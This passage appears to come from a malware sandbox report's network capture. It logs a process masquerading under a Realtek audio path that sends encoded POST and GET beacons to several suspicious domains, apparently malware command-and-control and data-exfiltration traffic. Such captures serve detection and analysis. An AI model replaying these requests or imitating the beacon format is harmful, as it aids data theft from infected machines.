                                                                                3 | 192.168.11.20 | 49744 | 172.67.145.234 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 11:57:44.662894964 CET | 729 | OUT | POST /4twy/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.vayui.top
                                                                                Origin: http://www.vayui.top
                                                                                Referer: http://www.vayui.top/4twy/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Ascii: 2WLcH=rDqkmhD2LOnTjsb8dPDm0WO7+cCWLvWIxCfIngjhht3HkOGP0Vo3Q4sUNC9nYizsyrCiH67OXCQLA4O/Oq7CGNI/lSyuZC58b5wu1QrD/EyS74acjJ76DGIwvfJGNCaX9Y1JhuddFroW4bLnhKcwiNO9vScts1V0UHBKn1PVUsR2tSC6H1lx4lWsXMCdfoNZrVvUTVC2X3+1+Zw9sJ7iEDA=
                                                                                Nov 25, 2024 11:57:44.894789934 CET | 875 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 10:57:44 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rW0Y8xbgpcUmH5YdZfgzYjN9Hl3tRSoydkmHgvKo%2FjhuxFVdUZznlZ3Kq0t273M40EM7JfTgz7JijBqwsYvg8kUSaVok3z7zE0T0Nd0LUnbEe%2BBPTduAZQDaadmt3kpr"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e811e9e7bdf7cfc-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=97601&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=729&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Nov 25, 2024 11:57:44.894800901 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                4 | 192.168.11.20 | 49745 | 172.67.145.234 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 11:57:47.287607908 CET | 2578 | OUT | POST /4twy/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.vayui.top
                                                                                Origin: http://www.vayui.top
                                                                                Referer: http://www.vayui.top/4twy/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 11:57:47.287688017 CET | 5300 | OUT
                                                                                Data Ascii: 1+B8h0bj7hNE6LyyyfAOFohS3rd83lTXUFsaXwodGXKkuFS7jWd16xKh7C4ExcchxzwSfmvnvLl+KEGiwdpGgkISWGsXVBiszjq8a/Ktb8FwdH/vm99iAPS7O8mjsQyVFMXiNBHWOn7fyRrhX0xvuWwTON9x43ibo7Dh5HMclffS1+L86lXdYOXg0lI0z7qR+QajtBSNwAADKAV5ErhWY30CVlSJwPxVtw31vR/OTlC9ZkPLZFv
                                                                                Nov 25, 2024 11:57:47.525825977 CET | 874 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 10:57:47 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fEsP6jJOsaZ4UcO2QBFwlE78G0mqDg5EToieOys4eVQZKhtYIq2MocKj2XfAk5IbfpOlJ5l4oS7djY%2BwpMx1plkyNmCc2L2pl6pXV1hlZdgm1BcpFFFk5YRX53OaJdUu"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e811eaedec8729b-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=97841&sent=5&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7878&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Nov 25, 2024 11:57:47.525876999 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                5 | 192.168.11.20 | 49746 | 172.67.145.234 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 11:57:49.910576105 CET | 451 | OUT | GET /4twy/?2WLcH=mBCElVLkK93E7Nf+Sf/fyHG4g+iIHO2SyRrruRXkg+zqtIWho1c/UJ5ICRtgbVPxo7eZFunASSkRDpjuJtL+E+17mAmUYSpmNLkEhz/yhl+/g4aluoCzA3U=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.vayui.top
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 11:57:50.160717010 CET | 886 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 10:57:50 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lcKpuNuvD79J%2FgwQVB9l7KrOarVNBtdPXlsLOf0DbGn8RdODJk8wi2LAQmbjGcma9RmB5cCBFOvIGhDVC1w4w5EhrwZSWJu9ffHCnupNG8tPjls0IsjK2keSTUzDLEC7"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e811ebf3f8641de-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=97340&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=451&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                Nov 25, 2024 11:57:50.160768032 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                6 | 192.168.11.20 | 49747 | 13.248.169.48 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 11:57:55.391695023 CET | 706 | OUT | POST /tj5o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.tals.xyz
                                                                                Origin: http://www.tals.xyz
                                                                                Referer: http://www.tals.xyz/tj5o/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Ascii: 2WLcH=BjujimrNKiiVbQeTik18TgIHXypRjXe9Bac8Kwx8q4TEvxJmpkPuRMYqGPjB9IDA+clAbc26qTHYILHAdWH3EpKw0rxHPa8uxYtdP1TQFayKU3fLMCgp87UBdP2G1/RbXLKdCgTtwwOu+7eGFoH5sKTFXohnmEiac6kotso2cidQr1o68WsaNYDLdlldsWjQwg==


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                7 | 192.168.11.20 | 49748 | 13.248.169.48 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 11:57:58.027862072 CET | 726 | OUT | POST /tj5o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.tals.xyz
                                                                                Origin: http://www.tals.xyz
                                                                                Referer: http://www.tals.xyz/tj5o/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Ascii: 2WLcH=BjujimrNKiiVJBuTgDh8UAIEJipRq3ehBaQ8Kx1spK3EuVNmogjuWMYqOvjE5ID9+co9bZW6qTTYIPDAdhT2CpKyt7xZQK8uxYtdP1X6FaKKUEXLMjgq/7UAMP2G/fRHXLK/ClulwyGu+6uGE8T616TDaIgFtVX4SOcG8sEQVXRwqjlghkY+OLf5ZVc1uUiLtr7y3k56n+Vh4OlBt9lKLB8=


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                8 | 192.168.11.20 | 49749 | 13.248.169.48 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 11:58:00.668463945 CET | 2578 | OUT | POST /tj5o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.tals.xyz
                                                                                Origin: http://www.tals.xyz
                                                                                Referer: http://www.tals.xyz/tj5o/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 11:58:00.668545008 CET | 5297 | OUT
                                                                                Data Ascii: fdPKgZQVDamuVeSqqqT7c9YK7HZzJZ1RvjKTF1zwUmXJO3+8ot6poJOX5xU3qhMEfsL4ANiuztP5BtkTybPnYyBUDFLpLKHpMsCD//ByIrjPwz3RlxnIy0cleO6KYhpH9f8mAif2Ccseggub51WSRDtyrZQDqGvlevNCblvzJDo4S+1J/9jbx6aruoTtjtXzxQ3/vLkwvYOZdCBu5nU9NVwPJ4TQYvH82a+KAFV3Xr+VsRV7S9k


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                9 | 192.168.11.20 | 49750 | 13.248.169.48 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 11:58:03.306689978 CET | 450 | OUT | GET /tj5o/?ZQ=9w6eOuayM&2WLcH=MhGDhTK4KRmGDwnOvV5WTz4iIRJmk2m8IatiCmUJgqSFlXJgrRiMUM9JCqLDwZv9mOpEe9GWmALCKqKQahiZVY7y7ZV5P9kCtZ0hNHTZPf+sBxGPFSp4opc= HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.tals.xyz
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 11:58:03.411736965 CET | 394 | IN | HTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Mon, 25 Nov 2024 10:58:03 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 254
                                                                                Connection: close
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZQ=9w6eOuayM&2WLcH=MhGDhTK4KRmGDwnOvV5WTz4iIRJmk2m8IatiCmUJgqSFlXJgrRiMUM9JCqLDwZv9mOpEe9GWmALCKqKQahiZVY7y7ZV5P9kCtZ0hNHTZPf+sBxGPFSp4opc="}</script></head></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                10 | 192.168.11.20 | 49751 | 31.31.196.177 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 11:58:08.976408005 CET | 730 | OUT | POST /sr6d/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.nartex-uf.online
                                                                                Origin: http://www.nartex-uf.online
                                                                                Referer: http://www.nartex-uf.online/sr6d/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Ascii: 2WLcH=4QBsHpHwE9KJiQovgUnwajRKPkHlPLuKstcdUZew+FeOPRbN6kTU2JgCmprgOp8MMBFYH686etf2ikE4YllETC5Z2BQJgrdVMdyHPf2KJ/vGibY/sxL0Pgd0TBdo15lRFTZBhzUf7IqIo4MQZcIXr4gdRLKR0mZfPycs18G9yS2Crj+o1DBkUR8zH8h4/apXjA==
                                                                                Nov 25, 2024 11:58:09.222405910 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 10:58:09 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Content-Encoding: gzip


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                11 | 192.168.11.20 | 49752 | 31.31.196.177 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 11:58:11.713042974 CET | 750 | OUT | POST /sr6d/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.nartex-uf.online
                                                                                Origin: http://www.nartex-uf.online
                                                                                Referer: http://www.nartex-uf.online/sr6d/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Ascii: 2WLcH=4QBsHpHwE9KJhxYvl3/wfDRFT0HlFruOstQdUYqg/36OPxrN5gPU7pgC/ZqqAJ8HMBJqH+g6etL2igA4fSxDSS5fvxQL97dVMdyHPfzdJ/3Giro/jwL3Mgd7Exdox5lVFTZvhyYl7O2Io48QZNIUh4gbcrLB4HooPB4k7eyEoweku1zyox1AXCgBDMYQ9YoM+CPGPaKN7nXNQTYlwRdVRCg=
                                                                                Nov 25, 2024 11:58:11.965981007 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 10:58:11 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Content-Encoding: gzip


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                12 | 192.168.11.20 | 49753 | 31.31.196.177 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 11:58:14.463921070 CET | 7899 | OUT | POST /sr6d/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.nartex-uf.online
                                                                                Origin: http://www.nartex-uf.online
                                                                                Referer: http://www.nartex-uf.online/sr6d/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Ascii: 2WLcH= [TRUNCATED]
                                                                                Nov 25, 2024 11:58:14.713517904 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 10:58:14 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Content-Encoding: gzip


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                13 | 192.168.11.20 | 49754 | 31.31.196.177 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 11:58:17.213864088 CET | 458 | OUT | GET /sr6d/?2WLcH=1SpMEcLzJ9Sn7Ad5q3DkRiZVN2jVBq+dlMgZT/nq/UyfSDPywFazxbh+/qzvL+EnIyZaTvIKZcPRrxMSWCBfdTtLgScf+bZOQub9cvrYC+7J/tJ5pDuOaT0=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.nartex-uf.online
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 11:58:17.449703932 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 10:58:17 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                14 | 192.168.11.20 | 49755 | 208.91.197.27 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 11:58:31.810784101 CET | 736 | OUT | POST /ftvk/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.614genetics.online
                                                                                Origin: http://www.614genetics.online
                                                                                Referer: http://www.614genetics.online/ftvk/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 4c 47 5a 76 57 4d 71 34 54 75 4c 66 74 45 57 78 56 50 50 79 48 6d 6f 41 64 36 34 4e 38 6f 62 74 67 58 2b 72 2b 74 5a 58 35 75 77 61 5a 4f 4b 59 70 41 61 76 38 6d 4e 4e 70 67 59 6b 35 45 37 57 33 77 5a 77 6b 49 74 44 46 33 6c 6d 67 4e 39 7a 6b 31 47 31 2b 7a 74 6e 47 38 52 67 73 39 71 65 54 70 68 76 39 33 59 51 31 53 69 65 7a 37 44 2f 77 73 56 70 6f 38 77 58 51 46 4f 54 4a 65 46 59 6b 56 69 46 46 6c 4e 46 69 36 4d 4a 30 5a 6d 58 77 63 67 77 7a 61 2b 65 6f 33 49 36 61 49 6e 55 39 62 4f 61 73 77 43 4a 71 7a 78 73 50 37 75 42 49 53 4e 74 49 32 66 54 6e 71 51 55 56 41 73 4c 71 41 3d 3d
                                                                                Data Ascii: 2WLcH=LGZvWMq4TuLftEWxVPPyHmoAd64N8obtgX+r+tZX5uwaZOKYpAav8mNNpgYk5E7W3wZwkItDF3lmgN9zk1G1+ztnG8Rgs9qeTphv93YQ1Siez7D/wsVpo8wXQFOTJeFYkViFFlNFi6MJ0ZmXwcgwza+eo3I6aInU9bOaswCJqzxsP7uBISNtI2fTnqQUVAsLqA==


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                15 | 192.168.11.20 | 49756 | 208.91.197.27 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 11:58:34.468408108 CET | 756 | OUT | POST /ftvk/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.614genetics.online
                                                                                Origin: http://www.614genetics.online
                                                                                Referer: http://www.614genetics.online/ftvk/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 4c 47 5a 76 57 4d 71 34 54 75 4c 66 73 6c 6d 78 5a 4f 50 79 57 57 6f 44 52 61 34 4e 6e 59 62 70 67 58 69 72 2b 73 4e 39 36 64 55 61 5a 75 36 59 6f 42 61 76 73 32 4e 4e 6a 41 59 72 6d 55 37 52 33 77 56 34 6b 4d 74 44 46 30 5a 6d 67 49 42 7a 6b 6d 75 30 78 44 74 6c 4f 63 52 69 69 64 71 65 54 70 68 76 39 32 38 36 31 53 4b 65 7a 4c 7a 2f 69 39 56 6f 68 63 77 59 54 46 4f 54 59 75 45 52 6b 56 69 37 46 6b 52 37 69 38 51 4a 30 64 69 58 77 70 4d 2f 36 61 2b 69 77 58 49 73 63 71 4c 61 6b 76 48 6d 6d 77 47 79 6a 7a 78 6b 44 4e 6a 62 56 67 35 4a 4c 6c 44 68 6a 61 70 38 58 43 74 51 33 4e 71 61 6d 69 79 59 56 69 68 6f 46 43 6d 78 36 48 70 33 75 6a 38 3d
                                                                                Data Ascii: 2WLcH=LGZvWMq4TuLfslmxZOPyWWoDRa4NnYbpgXir+sN96dUaZu6YoBavs2NNjAYrmU7R3wV4kMtDF0ZmgIBzkmu0xDtlOcRiidqeTphv92861SKezLz/i9VohcwYTFOTYuERkVi7FkR7i8QJ0diXwpM/6a+iwXIscqLakvHmmwGyjzxkDNjbVg5JLlDhjap8XCtQ3NqamiyYVihoFCmx6Hp3uj8=


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                16 | 192.168.11.20 | 49757 | 208.91.197.27 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 11:58:37.123461962 CET | 2440 | OUT | POST /ftvk/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.614genetics.online
                                                                                Origin: http://www.614genetics.online
                                                                                Referer: http://www.614genetics.online/ftvk/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                17 | 192.168.11.20 | 49758 | 208.91.197.27 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 11:58:39.778230906 CET | 460 | OUT | GET /ftvk/?2WLcH=GExPV6KtXOXigkukfMfleD4xRaYqvrj5rkn1yqQr0MAVEMidlCaC83oYsDNl6Uf72gZXo4lyCEReg4R57wnVyD0gHtEFldueDrd90mwd3SDfs8vpytBw7tE=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.614genetics.online
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 11:58:40.408185005 CET | 993 | IN | HTTP/1.1 200 OK
                                                                                Date: Mon, 25 Nov 2024 10:58:39 GMT
                                                                                Server: Apache
                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                Set-Cookie: vsid=901vr480077920113263890; expires=Sat, 24-Nov-2029 10:58:40 GMT; Max-Age=157680000; path=/; domain=www.614genetics.online; HttpOnly
                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_nliGpZw9a+vIqQk4n24drIRSfnz0jpEWksgVyLyIjzGopdQ5VVlFzjjVjvjFilVa/OyByJmE9jiTLbFFlBmNAg==
                                                                                Content-Length: 2630
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Connection: close


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                18 | 192.168.11.20 | 49759 | 8.210.46.21 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 11:58:47.291840076 CET | 724 | OUT | POST /r45a/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.prhmcjdz.tokyo
                                                                                Origin: http://www.prhmcjdz.tokyo
                                                                                Referer: http://www.prhmcjdz.tokyo/r45a/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
